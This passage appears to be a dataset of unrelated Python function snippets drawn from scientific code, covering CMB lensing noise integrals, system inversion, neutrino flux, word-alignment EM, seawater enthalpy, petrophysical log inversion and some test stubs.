self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTB(l2)\n result += 0. #self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TB.__func__, \"integ\"):\n self.N_TT_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_get_nveto_pmt_item(self):\n pass", "def stbinv(A, B, C, D, y, t):\n # Description to help the user\n\n # calculate the number of samples of the output\n N = np.shape(y)[\n 1\n ] # the number of samples is the number of columns of the data matrix y\n\n # calculate system's dimensions: number of states and number of inputs\n m = B.shape[1] # number of inputs\n n = A.shape[0] # number of states\n\n # initialize the variable v (additional input)\n v = np.zeros((n, N)) # it will be important later\n\n # initializing the flag variable\n flag = 0\n # initializing the flag variable for the vrft method\n flag_vr = 0\n # initializing the counter of reduction steps done by the algorithm\n kround = 0\n\n # starting the loop of the reduction procedure\n while flag == 0:\n # run a step of the reduction order algorithm\n Ahat, Bhat, Chat, Dhat, yhat, vhat, nhat, phat, rhat = invredc(A, B, C, D, y, v)\n # increase the counter of reductions\n kround = kround + 1\n\n # preallocating the state vector of the inverse system\n xhat = np.zeros((nhat, N - kround)) # it must have N-kround samples\n # preallocating the calculated input\n uhat = np.zeros((m, N - kround))\n\n # defining the reduced time vector\n tt = t[:, 0 : N - kround]\n\n # test the conditions of invertibility\n if phat < m:\n # if this condition is true, then the algorithm has failed and it is not possible to find the inverse\n flag = 1\n flag_vr = 1\n # if this is the case, we print a message and end the execution\n # print('The inversion algorithm has failed')\n return uhat, tt, flag_vr\n else:\n if rhat == m:\n # ((rhat==m)&(rhat==phat)):\n # if this condition is true, then the algorithm is done. 
We can calculate the signal u\n flag = 2\n # calculating the inverse of the feedforward matrix\n # E=np.linalg.inv(Dhat)\n E = np.linalg.pinv(Dhat)\n else:\n # if none of the conditions above is true, then we need to proceed to another round of the reduction step of the algorithm\n A = Ahat\n B = Bhat\n C = Chat\n D = Dhat\n y = yhat\n v = vhat\n # after the reduction procedure is done, then the system can be inverted\n\n # calculating the dynamic matrix of the inverse system\n Ainv = Ahat - Bhat @ E @ Chat\n # eigenvalues of the inverse system's dynamic matrix\n wv, v = np.linalg.eig(Ainv) # w=eigenvalues, v=eigenvectors\n # calculating the input matrix of the inverse system\n Binv = Bhat @ E\n # calculating the output matrix of the inverse system\n Cinv = -E @ Chat\n # calculating the feedforward matrix of the inverse system\n Dinv = E\n\n # test if the inverse dynamic system is stable\n wbool = wv > 1\n wsum = np.sum(wbool)\n # test if wsum is greater than 1\n if wsum > 0:\n # if wsum is greater than 1, then, the inverse system is unstable, so we end the execution of the algorithm\n # print('The inverse system is unstable')\n flag_vr = 2\n return uhat, tt, flag_vr\n else:\n # if wsum=0, then the inverse system is stable, and we can calculate the input signal\n # calculate the first value for the output (t=0)\n uhat[:, 0] = Cinv @ xhat[:, 0] + Dinv @ yhat[:, 0]\n # calculate the states and the output of the inverse system\n for k in range(0, N - 1 - kround):\n xhat[:, k + 1] = Ainv @ xhat[:, k] + Binv @ yhat[:, k] + vhat[:, k]\n uhat[:, k + 1] = Cinv @ xhat[:, k + 1] + Dinv @ yhat[:, k + 1]\n\n return uhat, tt, flag_vr", "def Phi_nu_mu1(self, E_nu, N=1e24):\n #check this \n try:\n phi = [0.]*len(E_nu)\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n for i, E_nu in enumerate(E_nu):\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n\n for j in range(Intervals):\n phi[i] += 1.6*N*quad(Int, IntegrationBoundary[j], IntegrationBoundary[j+1])[0]\n\n return np.array(phi)\n\n except TypeError as e:\n phi = 0.\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n for i in range(Intervals):\n phi += 1.6*N*quad(Int, IntegrationBoundary[i], IntegrationBoundary[i+1])[0]\n print (phi)\n\n return phi", "def test_active_inference_SPM_1b(self):", "def test_compute_inventory():\n T = [1000]\n c_max = [1e20]\n time = 1e3\n inv, sig = divHretention.compute_inventory(T, c_max, time)\n assert len(inv) == len(sig)\n assert len(inv) == len(T)", "def em_step(t, eng, fre):\n # TODO\n # Lecture Steps:\n # 1. Make a table of P(f|e) for all possible pairs of f and e, prob_tab\n # 2. Make a grid where each sentence pair is a row and each possible\n # alignment is a column\n # 3. For each sentence pair and alignment compute P(F|a,E)\n # Given aligned words f1,f2,...,fn and e1,e2,...,en in the pair:\n # P(F|a,E) = prob_tab[f1][e1] * ... * prob_tab[fn][en]\n # 4. For each sentence pair and alignment\n # divide P(F|a,E) by the sum of the P(F|a,E)'s in the row\n # this is P(a|E,F)\n # 5. 
For each possible word pair e and f, sum P(a|E,F) across all\n # alignments and sentence pairs for each instance that e is aligned\n # with f, this gets out a TCount table\n # 6. Sum over the rows of TCount to get the total estimates for each\n # english word e.\n # 7. Compute P(f|e) = TCount[f][e] / Total[e]\n # This is the model after 1 iteration.\n\n '''\n Tutorial Steps:\n initialize P(f|e)\n for a number of iterations:\n set tcount(f, e) to 0 for all f, e\n set total(e) to 0 for all e\n for each sentence pair (F, E) in training corpus:\n for each unique word f in F:\n denom_c = 0\n for each unique word e in E:\n denom_c += P(f|e) * F.count(f)\n for each unique word e in E:\n tcount(f, e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n total(e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n for each e in domain(total(:)):\n for each f in domain(tcount(:,e)):\n P(f|e) = tcount(f, e) / total(e)\n '''\n\n '''\n My Pseudocode:\n The Table of P(f|e) is already initiated as the AM dictionary.\n Presumably the AM is passed in as t.\n Initialize TCount as a dictionary like AM, e.g. TCount[e][f] = 0\n Initialize Total as a dictionary with the same entries as TCount[e] = 0\n for i in range(0,len(eng)):\n\n '''\n AM = dict.fromkeys(t.keys(), 0)\n Total = dict.fromkeys(t.keys(), 0)\n TCount = dict.fromkeys(t.keys(), 0)\n for key in TCount.keys():\n TCount[key] = dict.fromkeys(t[key].keys(), 0)\n AM[key] = dict.fromkeys(t[key].keys(), 0)\n\n num_sentences = min(len(eng), len(fre))\n for i in range(0, num_sentences):\n E = eng[i]\n F = fre[i]\n E_uniques = list(set(E))\n F_uniques = list(set(F))\n for f in F_uniques:\n denom_c = 0\n for e in E_uniques:\n denom_c += t[e][f] * F.count(f)\n for e in E_uniques:\n TCount[e][f] += t[e][f] * F.count(f) * E.count(e) / denom_c\n Total[e] += t[e][f] * F.count(f) * E.count(e) / denom_c\n for e in Total.keys():\n for f in TCount[e].keys():\n AM[e][f] = TCount[e][f] / Total[e]\n\n return AM", "def test_nr_trinuc(self):\n preds = [\n MotifChange(\"A\", \"C\"),\n MotifChange(\"G\", \"A\"),\n MotifChange(\"CGA\", \"TGA\"),\n ]\n sm = substitution_model.TimeReversibleTrinucleotide(predicates=preds)\n got = sm.get_param_list()\n self.assertEqual(got, [\"A/C\", \"G/A\", \"CGA/TGA\"])\n self.assertEqual(len(sm.get_motifs()), 64)", "def N_TE_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. 
#self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EB.__func__, \"integ\"):\n self.N_TE_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def N_TE_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_EE.__func__, \"integ\"):\n self.N_TE_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_generate_nb(self):\n pass", "def MPinv(list_of_ch,direction, angle, azimuth):\n\n\n \"\"\"~~~~~~~~~~~ Input conditions ~~~~~~~~~~~~~~\"\"\"\n ch_list = list_of_ch\n direction_deg = float(direction) #inclined direction of wellbore from North\n angle_deg = float(angle) # inclined angle of well \n azimuth_deg = float(azimuth) # core orientation from North or inclined direction \n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n azimuth_deg = azimuth_deg - 45\n\n \"\"\"~~~~~~~~~~~ Allocate numbers to each direction (for example, xx => 0, xy => 3 etc...) 
~~~~~~~~~~~~~~\"\"\"\n ch_col = ch_list.columns.values\n\n if \"xx\" in ch_col: ch_list.at[\"ch_no\",\"xx\"] =0\n if \"yy\" in ch_col: ch_list.at[\"ch_no\",\"yy\"] =1\n if \"zz\" in ch_col: ch_list.at[\"ch_no\",\"zz\"] =2\n if \"xy\" in ch_col: ch_list.at[\"ch_no\",\"xy\"] =3\n if \"yx\" in ch_col: ch_list.at[\"ch_no\",\"yx\"] =4\n if \"yz\" in ch_col: ch_list.at[\"ch_no\",\"yz\"] =5\n if \"zy\" in ch_col: ch_list.at[\"ch_no\",\"zy\"] =6\n if \"zx\" in ch_col: ch_list.at[\"ch_no\",\"zx\"] =7\n if \"xz\" in ch_col: ch_list.at[\"ch_no\",\"xz\"] =8\n\n ch = ch_list.loc[\"ch_no\",:].values\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n Number_of_vector = len(ch)\n No_v = Number_of_vector\n direction_rad = direction_deg*pi*180**(-1) \n angle_rad = angle_deg*pi*180**(-1) \n azimuth_rad = azimuth_deg*pi*180**(-1) \n\n\n \"\"\"~~~~~~~~ Create matrix of Direction Cosine vectors~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n c=np.cos(0.25*pi)\n s=np.sin(0.25*pi)\n n = np.zeros((3,9))\n\n n[:,0] = np.array([1,0,0])\n n[:,1] = np.array([0,1,0])\n n[:,2] = np.array([0,0,1])\n n[:,3] = np.array([c,s,0])\n n[:,4] = np.array([c,-s,0])\n n[:,5] = np.array([0,c,s])\n n[:,6] = np.array([0,c,-s])\n n[:,7] = np.array([c,0,s])\n n[:,8] = np.array([-c,0,s])\n\n\n \"\"\"~~~~~~~~~~~~~~ coordinate transformation from 'ASR local co-ordinate' to 'Geological co-ordinate' ~~~~~~~~~~~~~~~~~\"\"\"\n cdr = np.cos(direction_rad)\n sdr = np.sin(direction_rad)\n\n caz = np.cos(azimuth_rad)\n saz = np.sin(azimuth_rad)\n\n can = np.cos(angle_rad)\n san = np.sin(angle_rad)\n\n Rdr = np.array([[cdr, sdr, 0],[-sdr, cdr, 0],[0, 0, 1]]) #counter_clockwise\n Ran = np.array([[1, 0, 0],[0, can, san],[0, -san, can]])\n Raz = np.array([[caz, -saz, 0],[saz, caz, 0],[0, 0, 1]])\n\n R1 = Ran.dot(Rdr)\n R2 = Raz.dot(R1)\n\n for i in range(0,9):\n n[:,i] = R2.dot(n[:,i])\n n= np.round(n,6)\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n\n\n\n \"\"\"~~~~~~~~ Create matrix A (b = Ax: b;Observed normal strain data, x;strain tensor component which we have to determine) ~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n X = np.empty((No_v,6))\n\n for i in range(0,No_v):\n cc = ch[i]\n X[i,:] = np.array([n[0,cc]**2, n[1,cc]**2, n[2,cc]**2, 2*n[0,cc]*n[1,cc], 2*n[1,cc]*n[2,cc], 2*n[2,cc]*n[0,cc]])\n \"\"\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \"\"\"\n\n\n X_inv = np.linalg.pinv(X) # Calculate Moore-Penrose inverse matrix\n\n return X_inv", "def TR_algo7(self, p):\n h = 0\n ve = 0\n vd = self._vd\n m = max(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & ((~mu) & 2**self._N-1)\n l = [bit_component(px, i) for px in p]\n # 2. 
construct a integer whose bits are given by l\n l = sum( [lx*2**j for j, lx in enumerate(l)] )\n l = T(ve, vd, l)\n w = inverse_gc(l)\n r = gcr(w, mu, pi)\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % self._N\n h = (h << mu_norm) | r\n return h", "def ec_matrix_vector(p0, T, n): \n if(n<=0):\n EC=np.zeros(T.shape)\n return EC\n else:\n \"\"\"Probability vector after (k=0) propagations\"\"\" \n p_k=1.0*p0\n \"\"\"Sum of vectors after (k=0) propagations\"\"\"\n p_sum=1.0*p_k \n for k in xrange(n-1):\n \"\"\"Propagate one step p_{k} -> p_{k+1}\"\"\"\n p_k=np.dot(p_k,T) \n \"\"\"Update sum\"\"\"\n p_sum+=p_k \n \"\"\"Expected counts\"\"\"\n EC=p_sum[:,np.newaxis]*T \n return EC", "def enthalpy_SSO_0_p(p):\r\n v01 = 9.998420897506056e+2\r\n v05 = -6.698001071123802\r\n v08 = -3.988822378968490e-2\r\n v12 = -2.233269627352527e-2\r\n v15 = -1.806789763745328e-4\r\n v17 = -3.087032500374211e-7\r\n v20 = 1.550932729220080e-10\r\n v21 = 1.0\r\n v26 = -7.521448093615448e-3\r\n v31 = -3.303308871386421e-5\r\n v36 = 5.419326551148740e-6\r\n v37 = -2.742185394906099e-5\r\n v41 = -1.105097577149576e-7\r\n v43 = -1.119011592875110e-10\r\n v47 = -1.200507748551599e-15\r\n SSO = 35.16504\r\n a0 = v21 + SSO * (v26 + v36 * SSO + v31 * np.sqrt(SSO))\r\n a1 = v37 + v41 * SSO\r\n a2 = v43\r\n a3 = v47\r\n b0 = v01 + SSO * (v05 + v08 * np.sqrt(SSO))\r\n b1 = 0.5 * (v12 + v15 * SSO)\r\n b2 = v17 + v20 * SSO\r\n b1sq = b1 ** 2\r\n sqrt_disc = np.sqrt(b1sq - b0 * b2)\r\n N = a0 + (2 * a3 * b0 * b1 / b2 - a2 * b0) / b2\r\n M = a1 + (4 * a3 * b1sq / b2 - a3 * b0 - 2 * a2 * b1) / b2\r\n A = b1 - sqrt_disc\r\n B = b1 + sqrt_disc\r\n part = (N * b2 - M * b1) / (b2 * (B - A))\r\n db2Pascal = 10000.0\r\n return (db2Pascal * (p * (a2 - 2 * a3 * b1 / b2 + 0.5 * a3 * p) / b2 +\r\n (M / (2 * b2)) * np.log(1 + p * (2 * b1 + b2 * p) / b0) + part *\r\n np.log(1 + (b2 * p * (B - A)) / (A * (B + b2 * p)))))", "def evaltr(x_solution): \n \n large = 10.0**30\n pred = np.zeros(cfg.ntrain)\n e0 = 0.0 # mean of observed values\n y=0.0\n for i in range(cfg.ntrain): # Computation of correct piece\n e0 += cfg.a_unscaled[i][-1]\n pind = 0\n ipbest = 0\n pbest = -large # for max\n \n for j1 in range(cfg.nomax):\n ipmin=pind\n pmin=large # for min\n for _ in range(cfg.jk[j1]):\n piece=x_solution[(pind+1)*cfg.nfea-1] \n for j3 in range(cfg.nfea-1): #\n piece += x_solution[pind*cfg.nfea+j3]*cfg.a_unscaled[i][j3]\n if piece < pmin:\n ipmin = pind\n pmin = piece\n pind += 1 \n \n if pmin > pbest:\n ipbest = ipmin\n pbest = pmin\n \n pred[i] = x_solution[(ipbest+1)*cfg.nfea-1] # Computation of prediction\n for j1 in range(cfg.nfea-1):\n pred[i] += x_solution[ipbest*cfg.nfea+j1]*cfg.a_unscaled[i][j1]\n y += pred[i]\n \n y = y/cfg.ntrain \n e0 = e0/cfg.ntrain\n \n # Computation of indices\n rmse = 0.0\n mae = 0.0\n e1 = 0.0\n for i in range(cfg.ntrain):\n rmse += (pred[i]-cfg.a_unscaled[i][-1])**2\n mae += np.abs(pred[i]-cfg.a_unscaled[i][-1]) \n e1 += (cfg.a_unscaled[i][-1] - e0)**2\n ce = 1.0 - rmse/e1 \n rmse = np.sqrt(rmse/cfg.ntrain)\n mae = mae/cfg.ntrain \n\n if cfg.ntrain > 1:\n sx=0.0\n sy=0.0\n rcor=0.0\n for i in range(cfg.ntrain):\n sx += (pred[i]-y)**2\n sy += (cfg.a_unscaled[i][-1]-e0)**2 \n rcor += (pred[i]-y) * (cfg.a_unscaled[i][-1]-e0) \n\n r = rcor/np.sqrt(sx*sy)\n \n return rmse,mae,ce,r", "def binary_dec(A,n_iter = 1000):\n\n\t### Initialization ###\n\n\tp, q = np.shape(A)\n\t### B : to be changed\n\tB = np.eye(p)\n \t###\n\tC = bin_random_mat(p,q)\n\tlist_dist = []\n\tB_argmin = B\n\tC_argmin = C\n\n\n\n\n\t## 
temperature ##\n\tT_n = np.log(np.arange(2,n_iter+2,1))\n\t#T_n = np.arange(2,n_iter+2,1)\n\tfor i in range(n_iter):\n\t## update ##\n\t\tC_0 = np.matrix(C)\n\t\tlist_dist =np.append( list_dist, V_potential(np.dot(B,C_0),A) )\n\t\tif V_potential(np.dot(B_argmin,C_argmin),A) == 0:\n\t\t\tbreak\n\t########## transition #############\n\t# Here we take 2 steps independent(for B and for C respectively)\n\t# We could also use metropolis hasting kernel.\n\n\t\tC_iter = np.matrix(Metropolis_transition_C(C))\n\t\n\n\t\tB_iter = B[np.random.permutation(np.arange(p))]\n\t\t\n\t\tif np.random.uniform(0,1,1) < \\\n\t\t\t\tnp.exp(-1./T_n[i]*( V_potential(np.dot(B_iter,C_iter), A)\\\n\t\t\t\t - V_potential(np.dot(B,C_0),A) ) ):\n\t\t\tC = C_iter\n\t\t\tB = B_iter\n\t######### end of transition ##############\n\n\t\t\tif V_potential(np.dot(B,C),A) < np.min(list_dist):\n\t\t\t\t\n\t\t\t\tB_argmin = B\n\t\t\t\tC_argmin = np.matrix(C)\n\t\t\t# print i+1\n\t\t\t# print V_potential(np.dot(B_argmin,C_argmin),A)\n\t\t\t# print C_argmin\n\t\t\t# print '\\n'\n\n\treturn list_dist,B_argmin, C_argmin", "def condition_tpm(self,tpm, fixed_nodes, state):\n conditioning_indices = [[slice(None)]] * len(state)\n for i in fixed_nodes:\n # Preserve singleton dimensions with `np.newaxis`\n conditioning_indices[i] = [state[i], np.newaxis]\n # Flatten the indices.\n conditioning_indices = list(chain.from_iterable(conditioning_indices))\n # Obtain the actual conditioned TPM by indexing with the conditioning\n # indices.\n return tpm[tuple(conditioning_indices)]", "def test_T2():\n infile = \"cisd/T2.in\"\n assert(os.path.exists(infile))\n with open(infile) as f:\n lines = f.readlines()\n assert(len(lines) == 10)\n\n hl1 = HirataLine(lines[0])\n assert(set(hl1.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl1.summation_indices == '')\n assert(hl1.prefactors == [\"+ 1.0 \"])\n assert(hl1.postfactors == ['v ( p3 p4 h1 h2 )'])\n assert(str(hl1) == lines[0].replace('\\n', ''))\n cl1 = Cc4sLine(hl1)\n assert(set(cl1.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl1.summation_indices == \"\")\n assert(cl1.prefactors == [\"+ 1.0 \"])\n assert(cl1.postfactors == ['Vabij[\"cdij\"]'])\n assert(cl1.to_cpp() == ['( + 1.0 ) * Vabij[\"cdij\"];'])\n\n hl8 = HirataLine(lines[7])\n assert(set(hl8.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl8.summation_indices == ' h6 p5 ')\n assert(\n hl8.prefactors == [\n '+ 1.0 ',\n '- 1.0 * P( p3 p4 h2 h1 => p4 p3 h2 h1 ) ',\n '- 1.0 * P( p3 p4 h2 h1 => p3 p4 h1 h2 ) ',\n '+ 1.0 * P( p3 p4 h2 h1 => p4 p3 h1 h2 ) '\n ]\n )\n assert(\n hl8.postfactors ==\n ['Sum ( h6 p5 )', 't ( p5 p3 h6 h2 )', 'v ( h6 p4 h1 p5 )']\n )\n assert(str(hl8) == lines[7].replace('\\n', ''))\n cl8 = Cc4sLine(hl8)\n assert(set(cl8.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl8.summation_indices == \" n e \")\n assert(\n cl8.prefactors ==\n ['+ 1.0 ',\n '- 1.0 * P( c d j i => d c j i ) ',\n '- 1.0 * P( c d j i => c d i j ) ',\n '+ 1.0 * P( c d j i => d c i j ) ']\n )\n assert(cl8.postfactors == ['Tabij[\"ecnj\"]', 'Viajb[\"ndie\"]'])\n assert(\n cl8.to_cpp() == [\n '( + 1.0 ) * Tabij[\"ecnj\"] * Viajb[\"ndie\"];',\n '( - 1.0 ) * Tabij[\"ednj\"] * Viajb[\"ncie\"];',\n '( - 1.0 ) * Tabij[\"ecni\"] * Viajb[\"ndje\"];',\n '( + 1.0 ) * Tabij[\"edni\"] * Viajb[\"ncje\"];'\n ]\n )", "def 
ORM2(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# --------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dk,Dpf],[HIc1,HIk,HIpf],[1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=0.000 # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[1] # Volume of organic component\n\t\tPHIe=XMatrix[2] # Volume of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current 
Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output 